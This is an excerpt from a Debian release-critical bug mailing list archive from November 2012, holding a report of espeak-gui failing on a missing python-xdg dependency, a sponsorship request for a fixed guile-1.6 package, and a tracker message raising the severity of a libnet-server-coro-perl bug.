Traceback (most recent call last):
  File /usr/bin/espeak-gui, line 25, in module
from src import main
  File /usr/share/espeak-gui/src/main.py, line 34, in module
from language import LanguageManager
  File /usr/share/espeak-gui/src/language.py, line 24, in module
from xdg import BaseDirectory
ImportError: No module named xdg
=

Installing python-xdg fixed it (thus it needs a depends on python-xdg).

Thank you!

Best regards,
Nelson


-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (100, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.5-trunk-amd64 (SMP w/8 CPU cores)
Locale: LANG=pt_BR.UTF-8, LC_CTYPE=pt_BR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages espeak-gui depends on:
ii  gconf2 3.2.5-1+build1
ii  python 2.7.3-3
ii  python-espeak  0.4-1
ii  python-gconf   2.28.1+dfsg-1
ii  python-gtksourceview2  2.10.1-2
ii  python-gtkspell2.25.3-12
ii  python-support 1.0.15

Versions of packages espeak-gui recommends:
pn  libtextcat0  none

espeak-gui suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#689687: guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite failures

2012-11-08 Thread Daniel Hartwig
On 9 November 2012 09:22, Daniel Hartwig mand...@gmail.com wrote:
 Andreas, I am not a DM, will you take care of this again?

I presume too much! :-)

I have uploaded this package to mentors with the attached debdiff.
Sponsoring welcome.

http://mentors.debian.net/debian/pool/main/g/guile-1.6/guile-1.6_1.6.8-10.3.dsc

Also have filed RFS.


guile-1.6.debdiff
Description: Binary data


Processed: Re: Bug#692800: libnet-server-coro-perl: Net::Server::Coro isn't useable without libnet-server-perl

2012-11-08 Thread Debian Bug Tracking System
Processing control commands:

 severity -1 serious
Bug #692800 [libnet-server-coro-perl] libnet-server-coro-perl: 
Net::Server::Coro isn't useable without libnet-server-perl
Severity set to 'serious' from 'normal'

-- 
692800: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692800
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org